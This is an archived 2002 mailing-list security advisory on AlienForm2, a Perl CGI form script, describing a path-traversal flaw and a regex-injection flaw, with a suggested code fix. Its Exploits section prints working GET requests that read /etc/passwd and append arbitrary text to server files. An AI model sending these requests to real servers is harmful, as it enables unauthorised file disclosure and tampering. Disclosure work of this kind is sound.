OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Nick Cleaton (nickcleaton.net)
Date: Mon Jun 10 2002 - 16:18:53 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    =====================================================================

    Vulnerable: AlienForm2 revision 1.5
    Category: Perl/CGI coding errors
    Impact: Subject to file permissions, an attacker can read any
                    file on the server, append arbitrary data to any
                    existing file or write arbitrary data to new files.
    Date: 10th June 2002
    Vendor: Jon Hedley
    Homepage: http://www.cgi.tj/scripts/alienform/
    Vendor Status: Notified 24th April 2002
    Vendor Fix: None available

    Details
    =======

    AlienForm2 by Jon Hedley is a template driven form processing Perl
    CGI script. It is normally installed as af.cgi or alienform.cgi.
    Template files on the server are used to configure the format of the
    output document, the name of a log file and the format of the data to
    append to the log file.

    AlienForm2 is published under a licence that does not allow me to
    reproduce parts of it here without permission, which I have been
    unable to obtain. This advisory is best read in conjunction with a
    copy of af.cgi.

    The paths to the template files come from CGI inputs, and a flaw in
    the code that cleans up those inputs allows any file on the server to
    be used as a template file. The cleanup code replaces bad characters
    and constructs with the empty string, and the input string ".|./" is
    transformed by the cleanup code to "../".

    The path cleanup code can be found on lines 185, 186, 197 and 198 of
    af.cgi.

    The name of a CGI input in square brackets in a template is replaced
    with the value of that input. The regular expression which performs
    the replacement is not resilient to regular expression metacharacters
    in the name of a CGI input, allowing an attacker to take full control
    of the contents of a template after CGI input substitution.

    The CGI input substitution code can be found on line 246 of af.cgi.

    Suggested Fix
    =============

    On lines 185 and 197, change [] to [_]

    On lines 186 and 198, change // to /_/

    On lines 246 and 248, change $key to \Q$key\E

    Exploits
    ========

    Arbitrary file disclosure:

    GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F
    .|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

    File writing:

    This proof of concept exploit appends the text "hello there" to the
    file /tmp/foo on the web server. It requires the existence of the
    file /tmp/passwd, consisting of just the three lines:

    root:*:0:0:Charlie &:/root:/bin/csh
    httpd:*:1004:1004:Apache daemon:/:/nonexistent
    nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

    This exploit can be readily adapted to use any other file of two or
    more lines in place of /tmp/passwd, and the file disclosure
    vulnerability could be used to find a suitable file. That process
    could be automated.

    GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.
    %2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.
    %2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http
    d.*|x9=hello+there&x9|^nobody.*%0A|x9=
     
    =====================================================================

    --
    Nick Cleaton
    nickcleaton.net